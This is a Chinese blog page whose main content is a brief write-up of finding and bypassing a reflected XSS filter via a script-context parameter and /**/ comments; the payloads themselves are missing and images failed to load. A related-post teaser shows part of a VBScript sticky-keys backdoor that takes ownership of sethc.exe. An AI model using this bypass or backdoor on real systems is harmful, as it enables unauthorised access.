在掃瞄的過程中發現,存在這樣的url對引數的雙引號沒有過濾。
[外鏈轉存失敗,源站可能有防盜煉機制,建議將儲存下來直接上傳(img-s6ykoqhp-1610897569753)(
手動檢視,發現存在四個引數,均沒有對雙引號進行過濾,僅僅對<>進行了實體編碼:例如:200"<
四個引數如下:
[外鏈轉存失敗,源站可能有防盜煉機制,建議將儲存下來直接上傳(img-n8cw6eid-1610897569756)(
但是這裡注意到後面兩個引數是存在於script中的,也就是說我們不需要<>去再次構造標籤執行語句,而是直接讓他執行到我們的語句就可以了。
所以這裡我一開始這樣構造。
得到的html為:
沒有執行,本地測試也不行,看來語句沒有走下去。這裡說明他的上一句出錯了。
那把這一句也注釋掉下一行再重新執行js不就行了。於是我的url變成了:
函式名變成了__parent.sso.instances[0].callback,也就是說把//轉義了。
思路行不通開始關注別的引數。這裡我注意到crossdomain同樣也在srcipt中,如果我把他後面的全部注釋掉呢?這裡就想到要用/**/,於是我的paload變成了:
ok成功bypass
有意思的後門
dim obj,success set obj createobject wscript.shell success obj.run cmd c takeown f systemroot system32 sethc.exe 0,true success obj.run cmd c echo y c...
有意思的number format
申明 這是個人原創,在cnblogs上也有,都是自己寫的所以放原創了。number format number,decimals,decimalpoint,separator 有四個引數,第乙個和第二個引數是必須的,第三個和第四個是可選項。但實際測試中第三個和第四個這兩個引數必須同時存在,也就是要麼...
有意思的遞迴
先來乙個入門的 上初中學習數列求和什麼的時候我們就學過高斯的計算1到100的自然數的和的經典課文,那麼如果我們現在用程式的話該怎麼來做呢?自然是迴圈來做這件事。如果不用迴圈怎麼做呢?def sum first,end if end 1 return first elif end 1 return s...